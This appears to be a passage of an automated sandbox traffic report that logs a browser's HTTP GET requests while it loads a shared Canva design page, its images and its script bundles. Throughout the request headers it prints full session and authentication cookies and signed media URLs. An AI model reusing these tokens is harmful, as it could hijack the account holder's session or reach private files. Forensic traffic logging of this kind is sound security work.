cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/ae HTTP/1.1Host: www.canva.comConnection: keep-aliveX-Canva-Brand: BAAAAAAAAAAX-Canva-App: design_viewersec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Canva-Build-Sha: 4aaacc3X-Canva-User: UAAAAAAAAAAX-Canva-Analytics: AAMAA1dFQgA=sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Canva-Request: recordanalyticseventbatchsec-ch-ua-platform-version: "10.0.0"X-Canva-Locale: enX-Canva-Build-Name: 20241118-21sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /web/images/3e78ef31f2928a74c6d7ba19b91d0570.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/0483f2b648dcc986d01385062052ae1c.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/8e5950c0ed99c334 HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /web/images/e5c5a4d109aeb5234e4405032dfd4800.svg HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /v2/image-resize/format:PNG/height:831/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:1600?csig=AAAAAAAAAAAAAAAAAAAAAIeRpJCdaNjD5eFqoIZKm5NiX2vhXgUuA39yzwgWYvzu&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAIh84Mq_eVXBwPrghDB-WvEJm2_Tf6oLeXfO68GWCD7S&signer=media-rpc&x-canva-quality=screen_2x HTTP/1.1Host: media.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v2/image-resize/format:PNG/height:103/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:200?csig=AAAAAAAAAAAAAAAAAAAAACnFWDeI2NRpUVeqh9D2x3H-bJYfhhKLTqOrxo_xVEXT&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAOiwISUCqtQIuC3qHQC8BiIppp60e_dvY-XUn7C5tJ71&signer=media-rpc&x-canva-quality=thumbnail HTTP/1.1Host: media.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.js HTTP/1.1Host: chunk-composing.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /web/f0398d1166314304.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
Source: global trafficHTTP traffic detected: GET /web/images/8777e8ed572c4159d71b08cca2972b15.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/images/aba10b640f15bb01b8e5f0b804eefc7f.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/ae HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /web/images/e5c5a4d109aeb5234e4405032dfd4800.svg HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /v2/image-resize/format:PNG/height:103/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:200?csig=AAAAAAAAAAAAAAAAAAAAACnFWDeI2NRpUVeqh9D2x3H-bJYfhhKLTqOrxo_xVEXT&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAOiwISUCqtQIuC3qHQC8BiIppp60e_dvY-XUn7C5tJ71&signer=media-rpc&x-canva-quality=thumbnail HTTP/1.1Host: media.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /v2/image-resize/format:PNG/height:831/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:1600?csig=AAAAAAAAAAAAAAAAAAAAAIeRpJCdaNjD5eFqoIZKm5NiX2vhXgUuA39yzwgWYvzu&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAIh84Mq_eVXBwPrghDB-WvEJm2_Tf6oLeXfO68GWCD7S&signer=media-rpc&x-canva-quality=screen_2x HTTP/1.1Host: media.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
Source: global trafficHTTP traffic detected: GET /web/f0398d1166314304.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/ec8d2419e931aebd.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; 